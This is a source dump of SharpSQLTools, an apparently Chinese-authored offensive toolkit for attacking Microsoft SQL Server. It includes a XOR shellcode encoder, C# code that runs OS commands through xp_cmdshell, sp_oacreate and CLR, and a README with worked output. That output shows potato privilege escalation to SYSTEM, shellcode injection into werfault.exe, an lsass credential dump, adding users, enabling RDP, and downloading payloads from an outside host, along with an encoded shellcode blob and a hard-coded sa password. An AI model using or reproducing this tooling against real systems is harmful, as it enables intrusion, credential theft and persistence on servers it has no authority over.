├── SharpSQLTools ├── App.config ├── SharpSQLTools.csproj.user ├── Properties │ └── AssemblyInfo.cs ├── Batch.cs ├── SharpSQLTools.csproj └── Program.cs ├── Python └── Encrypt.py ├── SharpSQLTools.sln ├── .github └── workflows │ └── dotnet.yml └── README.md /SharpSQLTools/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /SharpSQLTools/SharpSQLTools.csproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 192.168.0.104 sa 1qaz%40WSX 5 | 6 | -------------------------------------------------------------------------------- /Python/Encrypt.py: -------------------------------------------------------------------------------- 1 | #coding:utf-8 2 | #Author:Evi1oX 3 | 4 | import sys 5 | import base64 6 | import argparse 7 | 8 | # xor(data, key): repeating-key XOR of data (bytes) with key (str, one byte per character via ord()). Symmetric, so the same call undoes it; this is obfuscation, not encryption. 9 | def xor(data, key): 10 | l = len(key) 11 | keyAsInt = list(map(ord, key)) # NOTE(review): ord() of a character outside Latin-1 exceeds 255, and bytearray() below would then raise ValueError 12 | return bytes(bytearray(( 13 | (data[i] ^ keyAsInt[i % l]) for i in range(0,len(data)) 14 | ))) 15 | 16 | if __name__ == '__main__': 17 | parser = argparse.ArgumentParser(description="python3 {0} -f payload.bin -k Evi1oX".format(sys.argv[0])) 18 | parser.add_argument("-f","--file", help="Raw Shellcode File",required=True) 19 | parser.add_argument("-k","--key", help="XOR Encrypted key",required=True) 20 | args = parser.parse_args() 21 | 22 | try: 23 | with open(args.file, 'rb') as f: 24 | scBytes = f.read() 25 | xorBytes = xor(scBytes, args.key) 26 | print("XorKey: "+args.key) 27 | print("Result: "+base64.b64encode(xorBytes).decode()) # the same base64 text is written to payload.txt below 28 | with open("payload.txt","w") as f: # relative to the current working directory; an existing payload.txt is overwritten 29 | f.write(base64.b64encode(xorBytes).decode()) 30 | except Exception as e: # any failure is only printed; sys.exit() below takes no argument, so the exit status is still 0 31 | print(e) 32 | sys.exit() -------------------------------------------------------------------------------- /SharpSQLTools/Properties/AssemblyInfo.cs: 
-------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // 有关程序集的一般信息由以下 6 | // 控制。更改这些特性值可修改 7 | // 与程序集关联的信息。 8 | [assembly: AssemblyTitle("SharpSQLTools")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("SharpSQLTools")] 13 | [assembly: AssemblyCopyright("Copyright © 2021")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | //将 ComVisible 设置为 false 将使此程序集中的类型 18 | //对 COM 组件不可见。 如果需要从 COM 访问此程序集中的类型, 19 | //请将此类型的 ComVisible 特性设置为 true。 20 | [assembly: ComVisible(false)] 21 | 22 | // 如果此项目向 COM 公开,则下列 GUID 用于类型库的 ID 23 | [assembly: Guid("3d20b0bd-086e-4ccf-a956-39a139139fd3")] 24 | 25 | // 程序集的版本信息由下列四个值组成: 26 | // 27 | // 主版本 28 | // 次版本 29 | // 生成号 30 | // 修订号 31 | // 32 | //可以指定所有这些值,也可以使用“生成号”和“修订号”的默认值, 33 | // 方法是按如下所示使用“*”: : 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /SharpSQLTools.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 14 4 | VisualStudioVersion = 14.0.25123.0 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpSQLTools", "SharpSQLTools\SharpSQLTools.csproj", "{3D20B0BD-086E-4CCF-A956-39A139139FD3}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Debug|x64 = Debug|x64 12 | Release|Any CPU = Release|Any CPU 13 | Release|x64 = Release|x64 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | 
{3D20B0BD-086E-4CCF-A956-39A139139FD3}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 17 | {3D20B0BD-086E-4CCF-A956-39A139139FD3}.Debug|Any CPU.Build.0 = Debug|Any CPU 18 | {3D20B0BD-086E-4CCF-A956-39A139139FD3}.Debug|x64.ActiveCfg = Debug|Any CPU 19 | {3D20B0BD-086E-4CCF-A956-39A139139FD3}.Debug|x64.Build.0 = Debug|Any CPU 20 | {3D20B0BD-086E-4CCF-A956-39A139139FD3}.Release|Any CPU.ActiveCfg = Release|Any CPU 21 | {3D20B0BD-086E-4CCF-A956-39A139139FD3}.Release|Any CPU.Build.0 = Release|Any CPU 22 | {3D20B0BD-086E-4CCF-A956-39A139139FD3}.Release|x64.ActiveCfg = Release|Any CPU 23 | {3D20B0BD-086E-4CCF-A956-39A139139FD3}.Release|x64.Build.0 = Release|Any CPU 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | EndGlobal 29 | -------------------------------------------------------------------------------- /.github/workflows/dotnet.yml: -------------------------------------------------------------------------------- 1 | name: "Build SharpSQLTools " 2 | 3 | on: 4 | push: 5 | branches: 6 | - master 7 | - releases/* 8 | 9 | jobs: 10 | build: 11 | runs-on: windows-2019 12 | steps: 13 | - name: checkout 14 | uses: actions/checkout@v1 15 | - name: Build DotNET40 16 | run: | 17 | cd "C:\Program Files (x86)\Microsoft Visual Studio\2019\Enterprise\MSBuild\Current\Bin\" 18 | .\MSBuild.exe -p:Configuration=Release $Env:GITHUB_WORKSPACE\ 19 | - name: Upload a Build Artifact 20 | uses: actions/upload-artifact@v2.2.2 21 | with: 22 | # Artifact name 23 | name: SharpSQLTools.exe 24 | path: D:\a\SharpSQLTools\SharpSQLTools\SharpSQLTools\bin\Release\SharpSQLTools.exe 25 | - name: zip_exe 26 | shell: powershell 27 | run: Compress-Archive -Path D:\a\SharpSQLTools\SharpSQLTools\SharpSQLTools\bin\Release\SharpSQLTools.exe -DestinationPath D:\a\SharpSQLTools\SharpSQLTools\SharpSQLTools\bin\Release\SharpSQLTools.zip 28 | - name: Create Release 29 | id: create_release 30 | uses: actions/create-release@v1 31 | env: 32 | 
GITHUB_TOKEN: ${{ secrets.TOKEN }} 33 | with: 34 | tag_name: ${{ github.run_number }} 35 | release_name: Release ${{ github.run_number }} 36 | draft: false 37 | - name: Upload Release Asset 38 | id: upload-release-asset 39 | uses: actions/upload-release-asset@v1 40 | env: 41 | GITHUB_TOKEN: ${{ secrets.TOKEN }} 42 | with: 43 | upload_url: ${{ steps.create_release.outputs.upload_url }} # This pulls from the CREATE RELEASE step above, referencing it's ID to get its outputs object, which include a `upload_url`. See this blog post for more info: https://jasonet.co/posts/new-features-of-github-actions/#passing-data-to-future-steps 44 | asset_path: D:\a\SharpSQLTools\SharpSQLTools\SharpSQLTools\bin\Release\SharpSQLTools.zip 45 | asset_name: SharpSQLTools.zip 46 | asset_content_type: application/zip 47 | -------------------------------------------------------------------------------- /SharpSQLTools/Batch.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Data; 4 | using System.Data.SqlClient; 5 | using System.IO; 6 | using System.Linq; 7 | using System.Text; 8 | 9 | namespace SharpSQLTools 10 | { 11 | class Batch 12 | { 13 | public static string RemoteExec(SqlConnection Conn, String Command, Boolean Flag) 14 | { 15 | String value = String.Empty; 16 | try 17 | { 18 | //TODO:发送Command命令 19 | SqlCommand cmd = new SqlCommand(); 20 | cmd.Connection = Conn; 21 | 22 | //查询数据记录 23 | cmd.CommandText = Command; 24 | cmd.CommandType = CommandType.Text; 25 | using (SqlDataReader reader = cmd.ExecuteReader()) 26 | { 27 | while (reader.Read()) 28 | { 29 | if (Flag) 30 | { 31 | value += String.Format("\r\n{0}", reader[0].ToString()); 32 | } 33 | else 34 | { 35 | value = reader[0].ToString(); 36 | } 37 | } 38 | } 39 | return value; 40 | } 41 | catch (Exception ex) 42 | { 43 | //Conn.Close(); 44 | Console.WriteLine("[!] 
Error log: \r\n" + ex.Message); 45 | } 46 | return null; 47 | } 48 | 49 | public static void CLRExec(SqlConnection Conn, String Command) 50 | { 51 | try 52 | { 53 | //TODO:发送Command命令 54 | SqlCommand cmd = new SqlCommand(); 55 | cmd.Connection = Conn; 56 | 57 | //查询数据记录 58 | cmd.CommandText = Command; 59 | cmd.CommandType = CommandType.Text; 60 | cmd.ExecuteNonQuery(); 61 | } 62 | catch (Exception ex) 63 | { 64 | //Conn.Close(); 65 | Console.WriteLine("[!] Error log: \r\n" + ex.Message); 66 | } 67 | } 68 | } 69 | } -------------------------------------------------------------------------------- /SharpSQLTools/SharpSQLTools.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {3D20B0BD-086E-4CCF-A956-39A139139FD3} 8 | Exe 9 | Properties 10 | SharpSQLTools 11 | SharpSQLTools 12 | v4.0 13 | 512 14 | true 15 | 16 | 17 | 18 | AnyCPU 19 | true 20 | full 21 | false 22 | bin\Debug\ 23 | DEBUG;TRACE 24 | prompt 25 | 4 26 | false 27 | 28 | 29 | AnyCPU 30 | pdbonly 31 | true 32 | bin\Release\ 33 | TRACE 34 | prompt 35 | 4 36 | false 37 | 38 | 39 | SharpSQLTools.Program 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 68 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | - 简介 2 | 3 | 和[RcoIl](http://github.com/rcoIl)一起写的小工具,可上传下载文件,xp_cmdshell与sp_oacreate双回显和clr加载程序集执行相应操作。功能参考[mssqlproxy](https://github.com/blackarrowsec/mssqlproxy),由于目前C#还不知如何获取SQL连接的socket,该项目中的mssqlproxy功能目前尚未实现。另外,Clr不适用于一些与线程进程相关的操作。 4 | 5 | ##### 编译环境为net 4.0 6 | 7 | ### 更新日志 8 | 9 | - 2021-08-05 10 | - 添加clr_badpotato 11 | - 修改原来的clr_potato为clr_efspotato 12 | 13 | - 2021-08-04 14 | - 添加一些clr实现的基本命令:pwd,ls,netstat,ps等等 15 | - 致谢[KevinJClark@csharptoolbox](https://gitlab.com/KevinJClark/csharptoolbox/-/tree/master/WindowsBinaryReplacements) & 
[rabbittb](https://github.com/rabbittb) 16 | 17 | - 2021-08-03 18 | - 添加clr_efspotato 19 | - 致谢[zcgonvh@EfsPotato](https://github.com/zcgonvh/EfsPotato) & [hl0rey](https://github.com/hl0rey) 20 | 21 | - 2021-07-10 22 | - 修复上传bug 23 | - 修复clr回显bug 24 | - 2021-06-22 25 | - 添加clr执行命令和程序 26 | - 添加clr合并文件功能,方便在cmd被拦截时代替copy /b合并文件 27 | - 修改支持自定义端口 28 | - 2021-05-27 29 | - 支持shellcode远程加载 30 | - 2021-01-19 31 | - 支持xp_cmdshell与sp_oacreate双回显 32 | - 支持clr加载程序集执行 33 | - 支持上传下载文件 34 | - 2019-12-18 35 | - 发布最初命令行版 36 | 37 | ### Usage 38 | 39 | ``` 40 | λ SharpSQLTools.exe 41 | 42 | _____ _ _____ ____ _ _______ _ 43 | / ____| | / ____|/ __ \| | |__ __| | | 44 | | (___ | |__ __ _ _ __ _ __| (___ | | | | | | | ___ ___ | |___ 45 | \___ \| '_ \ / _` | '__| '_ \\___ \| | | | | | |/ _ \ / _ \| / __| 46 | ____) | | | | (_| | | | |_) |___) | |__| | |____| | (_) | (_) | \__ \ 47 | |_____/|_| |_|\__,_|_| | .__/_____/ \___\_\______|_|\___/ \___/|_|___/ 48 | | | 49 | |_| 50 | by Rcoil & Uknow 51 | 52 | Usage: 53 | 54 | SharpSQLTools target:port username password database - interactive console 55 | SharpSQLTools target:port username password database module command - non-interactive console 56 | 57 | Module: 58 | 59 | enable_xp_cmdshell - you know what it means 60 | disable_xp_cmdshell - you know what it means 61 | xp_cmdshell {cmd} - executes cmd using xp_cmdshell 62 | sp_oacreate {cmd} - executes cmd using sp_oacreate 63 | enable_ole - you know what it means 64 | disable_ole - you know what it means 65 | upload {local} {remote} - upload a local file to a remote path (OLE required) 66 | download {remote} {local} - download a remote file to a local path 67 | enable_clr - you know what it means 68 | disable_clr - you know what it means 69 | install_clr - create assembly and procedure 70 | uninstall_clr - drop clr 71 | clr_pwd - print current directory by clr 72 | clr_ls {directory} - list files by clr 73 | clr_cd {directory} - change directory by clr 74 | clr_ps - list process by clr 75 | 
clr_netstat - netstat by clr 76 | clr_ping {host} - ping by clr 77 | clr_cat {file} - view file contents by clr 78 | clr_rm {file} - delete file by clr 79 | clr_exec {cmd} - for example: clr_exec whoami;clr_exec -p c:\a.exe;clr_exec -p c:\cmd.exe -a /c whoami 80 | clr_efspotato {cmd} - exec by EfsPotato like clr_exec 81 | clr_badpotato {cmd} - exec by BadPotato like clr_exec 82 | clr_combine {remotefile} - When the upload module cannot call CMD to perform copy to merge files 83 | clr_dumplsass {path} - dumplsass by clr 84 | clr_rdp - check RDP port and Enable RDP 85 | clr_getav - get anti-virus software on this machine by clr 86 | clr_adduser {user} {pass} - add user by clr 87 | clr_download {url} {path} - download file from url by clr 88 | clr_scloader {code} {key} - Encrypt Shellcode by Encrypt.py (only supports x64 shellcode.bin) 89 | clr_scloader1 {file} {key} - Encrypt Shellcode by Encrypt.py and Upload Payload.txt 90 | clr_scloader2 {remotefile} - Upload Payload.bin to target before Shellcode Loader 91 | exit - terminates the server process (and this session) 92 | 93 | ``` 94 | 95 | ### 功能介绍 96 | 97 | 支持交互模式与非交互模式,交互模式直接跟目标,用户名和密码即可。非交互模式直接跟模块与命令。 98 | 99 | ``` 100 | SharpSQLTools target:port username password database - interactive console 101 | SharpSQLTools target:port username password database module command - non-interactive console 102 | ``` 103 | 104 | 105 | 106 | #### xp_cmdshell执行命令 107 | 108 | ``` 109 | λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX xp_cmdshell master whoami 110 | [*] Database connection is successful! 111 | 112 | nt authority\system 113 | 114 | ``` 115 | 116 | 117 | 118 | #### sp_oacreate执行命令 119 | 120 | ``` 121 | λ SharpSQLTools.exe 192.168.0.102 sa 1qaz@WSX master sp_oacreate master "whoami" 122 | [*] Database connection is successful! 
123 | 124 | nt service\mssqlserver 125 | ``` 126 | 127 | #### clr执行命令 128 | 129 | ``` 130 | λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_exec whoami 131 | [*] Database connection is successful! 132 | [+] Process: cmd.exe 133 | [+] arguments: /c whoami 134 | [+] RunCommand: cmd.exe /c whoami 135 | 136 | nt service\mssql$sqlexpress 137 | 138 | λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_exec -p c:\windows/system32\whoami.exe 139 | [*] Database connection is successful! 140 | [+] Process: c:\windows/system32\whoami.exe 141 | [+] arguments: 142 | [+] RunCommand: c:\windows/system32\whoami.exe 143 | 144 | nt service\mssql$sqlexpress 145 | 146 | λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_exec -p c:\cmd.exe -a /c whoami 147 | [*] Database connection is successful! 148 | [+] Process: c:\cmd.exe 149 | [+] arguments: /c whoami 150 | [+] RunCommand: c:\cmd.exe /c whoami 151 | 152 | nt service\mssql$sqlexpress 153 | 154 | ``` 155 | 156 | #### clr_efspotato or clr_badpotato 157 | 158 | ``` 159 | λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_efspotato whoami 160 | [*] Database connection is successful! 161 | Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability). 162 | Part of GMH's fuck Tools, Code By zcgonvh. 163 | 164 | [+] Current user: NT AUTHORITY\NETWORK SERVICE 165 | [+] Get Token: 3352 166 | [+] Command : c:\Windows\System32\cmd.exe /c whoami 167 | [!] process with pid: 2012 created. 168 | ============================== 169 | 170 | 171 | nt authority\system 172 | 173 | λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_efspotato -p c:\windows/system32\whoami.exe 174 | [*] Database connection is successful! 175 | Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability). 176 | Part of GMH's fuck Tools, Code By zcgonvh. 
177 | 178 | [+] Current user: NT AUTHORITY\NETWORK SERVICE 179 | [+] Get Token: 3084 180 | [+] Command : c:\windows/system32\whoami.exe 181 | [!] process with pid: 164 created. 182 | ============================== 183 | 184 | 185 | nt authority\system 186 | 187 | λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_efspotato -p c:\cmd.exe -a /c whoami 188 | [*] Database connection is successful! 189 | Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability). 190 | Part of GMH's fuck Tools, Code By zcgonvh. 191 | 192 | [+] Current user: NT AUTHORITY\NETWORK SERVICE 193 | [+] Get Token: 3124 194 | [+] Command : c:\cmd.exe /c whoami 195 | [!] process with pid: 2080 created. 196 | ============================== 197 | 198 | 199 | nt authority\system 200 | ``` 201 | 202 | #### clr_scloader 203 | ``` 204 | λ python Encrypt.py -f nc.bin -k 1234 205 | XorKey: 1234 206 | Result: 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 207 | 208 | λ SharpSQLTools.exe 192.168.0.107 sa 1qaz@WSX master clr_scloader zXqw0MHa8zQxMnJlcGJhZWd6AuZUerhmUXq4Zil6uGYRerhGYXo8g3t4fgX4egL0nQ5SSDMeE3Xw+z51MPPR2WNzYny6YBO/cw57NeG5s7wxMjN8tPJHU3kz42S6eitwunITfTDi0GJ5zfp1uga7fDDkfgX4egL0nXPy/TxzMvUJ0kbFfT F/EDl3CuVE6mtwunIXfTDiVXW6PntwunIvfTDicr81uns14XNrdWlsam5wanJtcGh7t90ScmbO0mt1aGh7vyPbZMvOzW59j0VABm4BATQxc2V9uNR7td2SMjQxe7rReI4xNDgv85wxV3JgeLvXeLjDco59RRUzzud/vdtaMjUxMmp1ixuzXzHN5mRhfwL9fAPzfM7ye73zesz0ebvydYvYPOvRzeZ8uPVZJHBqf73TerrNcIiqkUVTzOF5s/d0MzIzfYlRXlAxMjM0MXNjdWF6utZmZWR5APJZOWhzY9bNVPRwFWYyNXm/dxAp9DNcebvVYmFzY3Vhc2N9zvJyZHjN+3m483+98HOJTf0NtcvkegLmec35vz9ziTy2L1PL5InDgZNkco6Xp46pzud7t/UaDzJNOLPP0Uc2j3YhQVtbMmp1uOjM4Q== 1234 209 | [*] Database connection is successful! 
210 | [+] EncryptShellcode: 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 211 | [+] XorKey: 1234 212 | [+] StartProcess werfault.exe 213 | [+] OpenProcess Pid: 2508 214 | [+] VirtualAllocEx Success 215 | [+] QueueUserAPC Inject shellcode to PID: 2508 Success 216 | [+] hOpenProcessClose Success 217 | 218 | 219 | [*] QueueUserAPC Inject shellcode Success, enjoy! 220 | ``` 221 | 222 | #### clr_scloader1 223 | ``` 224 | λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_scloader1 C:\Users\Public\payload.txt aaaa 225 | [*] Database connection is successful! 226 | [+] EncryptShellcodePath: C:\Users\Public\payload.txt 227 | [+] XorKey: aaaa 228 | [+] StartProcess werfault.exe 229 | [+] OpenProcess Pid: 3232 230 | [+] VirtualAllocEx Success 231 | [+] QueueUserAPC Inject shellcode to PID: 3232 Success 232 | [+] hOpenProcessClose Success 233 | 234 | 235 | [*] QueueUserAPC Inject shellcode Success, enjoy! 236 | ``` 237 | 238 | #### clr_scloader2 239 | ``` 240 | λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_scloader2 C:\Users\Public\beacon.bin 241 | [*] Database connection is successful! 242 | [+] ShellcodePath: C:\Users\Public\beacon.bin 243 | [+] StartProcess werfault.exe 244 | [+] OpenProcess Pid: 332 245 | [+] VirtualAllocEx Success 246 | [+] QueueUserAPC Inject shellcode to PID: 332 Success 247 | [+] hOpenProcessClose Success 248 | 249 | 250 | [*] QueueUserAPC Inject shellcode Success, enjoy! 251 | ``` 252 | 253 | #### clr_dumplsass 254 | 255 | ``` 256 | λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX master clr_dumplsass 257 | [*] Database connection is successful! 258 | 259 | [*] Dumping lsass (488) to C:\Windows\Temp\debug488.out 260 | [+] Dump successful! 261 | 262 | [*] Compressing C:\Windows\Temp\debug488.out to C:\Windows\Temp\debug488.bin gzip file 263 | [X] Output file 'C:\Windows\Temp\debug488.bin' already exists, removing 264 | [*] Deleting C:\Windows\Temp\debug488.out 265 | 266 | [+] Dumping completed. 
Rename file to "debug488.gz" to decompress. 267 | 268 | [*] Operating System : Windows Server 2008 R2 Standard 269 | [*] Architecture : AMD64 270 | [*] Use "sekurlsa::minidump debug.out" "sekurlsa::logonPasswords full" on the same OS/arch 271 | ``` 272 | 273 | ### clr_RDP 274 | 275 | ``` 276 | λ SharpSQLTools.exe 192.168.0.103 sa 1qaz@WSX master "clr_RDP" 277 | [*] Database connection is successful! 278 | [*] RDP is already enabled 279 | [+] RDP Port: 3389 280 | ``` 281 | 282 | ### clr_getav 283 | 284 | ``` 285 | λ SharpSQLTools.exe 192.168.0.103 sa 1qaz@WSX master "clr_getav" 286 | [*] Database connection is successful! 287 | [*] Finding.... 288 | [>] proName: wdswfsafe appName: 360杀毒-网盾 289 | [*] Finish! 290 | ``` 291 | 292 | #### clr_adduser 293 | 294 | ``` 295 | λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX master clr_adduser test1234 1qaz@WSX 296 | [*] Database connection is successful! 297 | [*] Adding User success 298 | [*] Adding Group Member success 299 | ``` 300 | 301 | #### clr_combine 302 | ``` 303 | λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_combine C:\Users\Public\payload.txt 304 | [*] Database connection is successful! 305 | [+] remoteFile: C:\Users\Public\payload.txt 306 | [+] count: 5 307 | [+] combinefile: C:\Users\Public\payload.txt_*.config_txt C:\Users\Public\payload.txt 308 | [*] 'C:\Users\Public\payload.txt_*.config_txt' CombineFile completed 309 | ``` 310 | 311 | #### clr_download 312 | 313 | ``` 314 | λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX master clr_download "http://192.168.28.185:8001/clac.bin" "c:\Users\Public\Downloads\test.bin" 315 | [*] Database connection is successful! 316 | [*] Download success 317 | ``` 318 | 319 | 320 | #### upload 321 | 322 | ``` 323 | λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX master upload C:\Users\Pentest\Desktop\test\usc.exe c:\Users\Public\Downloads\11.exe 324 | [*] Database connection is successful! 
325 | [*] Uploading 'C:\Users\Pentest\Desktop\test\usc.exe' to 'c:\Users\Public\Downloads\11.exe'... 326 | [+] 7-1 Upload completed 327 | [+] 7-2 Upload completed 328 | [+] 7-3 Upload completed 329 | [+] 7-4 Upload completed 330 | [+] 7-5 Upload completed 331 | [+] 7-6 Upload completed 332 | [+] 7-7 Upload completed 333 | [+] copy /b c:\Users\Public\Downloads\11.exe_x.config_txt c:\Users\Public\Downloads\11.exe 334 | [+] del c:\Users\Public\Downloads\*.config_txt 335 | [*] 'C:\Users\Pentest\Desktop\test\usc.exe' Upload completed 336 | ``` 337 | 338 | 339 | 340 | #### download 341 | 342 | ``` 343 | λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX master download c:\Users\Public\Downloads\t.txt C:\Users\Pentest\Desktop\test\t.txt 344 | [*] Database connection is successful! 345 | [*] Downloading 'c:\Users\Public\Downloads\t.txt' to 'C:\Users\Pentest\Desktop\test\t.txt'... 346 | [*] 'c:\Users\Public\Downloads\t.txt' Download completed 347 | ``` 348 | 349 | 350 | 351 | ### References 352 | 353 | https://github.com/blackarrowsec/mssqlproxy 354 | 355 | https://github.com/An0nySec/ShadowUser/blob/main/ShadowUser/Program.cs#L235 356 | 357 | https://github.com/GhostPack/SharpDump 358 | 359 | https://gist.github.com/jfmaes/944991c40fb34625cf72fd33df1682c0 360 | 361 | https://github.com/zcgonvh/EfsPotato 362 | 363 | https://gitlab.com/KevinJClark/csharptoolbox -------------------------------------------------------------------------------- /SharpSQLTools/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections; 3 | using System.Collections.Generic; 4 | using System.Data; 5 | using System.Data.SqlClient; 6 | using System.IO; 7 | using System.Linq; 8 | using System.Threading; 9 | 10 | namespace SharpSQLTools 11 | { 12 | class Program 13 | { 14 | static SqlConnection Conn; 15 | static Setting setting; 16 | static String sqlstr; 17 | 18 | private static void Help() 19 | { 20 | Console.WriteLine(@" 21 
| enable_xp_cmdshell - you know what it means 22 | disable_xp_cmdshell - you know what it means 23 | xp_cmdshell {cmd} - executes cmd using xp_cmdshell 24 | sp_oacreate {cmd} - executes cmd using sp_oacreate 25 | enable_ole - you know what it means 26 | disable_ole - you know what it means 27 | upload {local} {remote} - upload a local file to a remote path (OLE required) 28 | download {remote} {local} - download a remote file to a local path 29 | enable_clr - you know what it means 30 | disable_clr - you know what it means 31 | install_clr - create assembly and procedure 32 | uninstall_clr - drop clr 33 | clr_pwd - print current directory by clr 34 | clr_ls {directory} - list files by clr 35 | clr_cd {directory} - change directory by clr 36 | clr_ps - list process by clr 37 | clr_netstat - netstat by clr 38 | clr_ping {host} - ping by clr 39 | clr_cat {file} - view file contents by clr 40 | clr_rm {file} - delete file by clr 41 | clr_exec {cmd} - for example: clr_exec whoami;clr_exec -p c:\a.exe;clr_exec -p c:\cmd.exe -a /c whoami 42 | clr_efspotato {cmd} - exec by EfsPotato like clr_exec 43 | clr_badpotato {cmd} - exec by BadPotato like clr_exec 44 | clr_combine {remotefile} - When the upload module cannot call CMD to perform copy to merge files 45 | clr_dumplsass {path} - dumplsass by clr 46 | clr_rdp - check RDP port and Enable RDP 47 | clr_getav - get anti-virus software on this machin by clr 48 | clr_adduser {user} {pass} - add user by clr 49 | clr_download {url} {path} - download file from url by clr 50 | clr_scloader {code} {key} - Encrypt Shellcode by Encrypt.py (only supports x64 shellcode.bin) 51 | clr_scloader1 {file} {key} - Encrypt Shellcode by Encrypt.py and Upload Payload.txt 52 | clr_scloader2 {remotefile} - Upload Payload.bin to target before Shellcode Loader 53 | exit - terminates the server process (and this session)" 54 | ); 55 | } 56 | private static void logo() 57 | { 58 | Console.WriteLine(@" 59 | _____ _ _____ ____ _ _______ _ 60 | / ____| | 
/ ____|/ __ \| | |__ __| | | 61 | | (___ | |__ __ _ _ __ _ __| (___ | | | | | | | ___ ___ | |___ 62 | \___ \| '_ \ / _` | '__| '_ \\___ \| | | | | | |/ _ \ / _ \| / __| 63 | ____) | | | | (_| | | | |_) |___) | |__| | |____| | (_) | (_) | \__ \ 64 | |_____/|_| |_|\__,_|_| | .__/_____/ \___\_\______|_|\___/ \___/|_|___/ 65 | | | 66 | |_| 67 | by Rcoil & Uknow 68 | "); 69 | } 70 | 71 | /// <summary> 72 | /// Runs <paramref name="Command"/> through master..xp_cmdshell and prints every result row (Batch.RemoteExec with Flag=true joins the rows with "\r\n"). 73 | /// </summary> 74 | /// <param name="Command">OS command line; it is spliced verbatim into a single-quoted T-SQL literal, so a quote character in it breaks the statement.</param> 75 | static void xp_shell(String Command) 76 | { 77 | if (setting.Check_configuration("xp_cmdshell", 0) && !setting.Enable_xp_cmdshell()) // presumably "option is off and enabling it failed"; Setting is defined outside this listing, confirm 78 | { 79 | return; 80 | } 81 | sqlstr = String.Format("exec master..xp_cmdshell '{0}'", Command); // this literal batch text is what server-side auditing of the session would record 82 | Console.WriteLine(Batch.RemoteExec(Conn, sqlstr, true)); 83 | } 84 | 85 | /// <summary> 86 | /// Milliseconds since the Unix epoch, computed from DateTime.UtcNow, as a decimal string. 87 | /// </summary> 88 | public static string GetTimeStamp() 89 | { 90 | TimeSpan ts = DateTime.UtcNow - new DateTime(1970, 1, 1, 0, 0, 0, 0); 91 | return Convert.ToInt64(ts.TotalMilliseconds).ToString(); 92 | } 93 | 94 | /// <summary> 95 | /// Runs <paramref name="Command"/> through cmd.exe via sp_oacreate('wscript.shell') and prints the StdOut text read back with ReadAll. 96 | /// </summary> 97 | /// <param name="Command">OS command line; spliced verbatim into the T-SQL literal (same quoting caveat as xp_shell).</param> 98 | static void sp_shell(String Command) 99 | { 100 | if (setting.Check_configuration("Ole Automation Procedures", 0) && !setting.Enable_ola()) 101 | { 102 | return; 103 | } 104 | string sqlstr = String.Format(@" 105 | declare @shell int,@exec int,@text int,@str varchar(8000); 106 | exec sp_oacreate 'wscript.shell',@shell output 107 | exec sp_oamethod @shell,'exec',@exec output,'c:\windows\system32\cmd.exe /c {0}' 108 | exec sp_oamethod @exec, 'StdOut', @text out; 109 | exec sp_oamethod @text, 'ReadAll', @str out 110 | select @str", Command); 111 | Console.WriteLine(Batch.RemoteExec(Conn, sqlstr, true)); // the local sqlstr shadows the static field that xp_shell/clr_exec assign; @str is varchar(8000), so captured output is cut at 8000 chars 112 | } 113 | 114 | /// <summary> 115 | /// Runs <paramref name="Command"/> through the dbo.ClrExec stored procedure (presumably created by install_clr; not in this listing). 116 | /// </summary> 117 | /// <param name="Command">Argument passed verbatim inside a single-quoted literal.</param> 118 | static void clr_exec(String Command) 119 | { 120 | sqlstr = String.Format("exec dbo.ClrExec '{0}'", Command); 121 | Batch.CLRExec(Conn, sqlstr); // ExecuteNonQuery: no result set is read, so any output 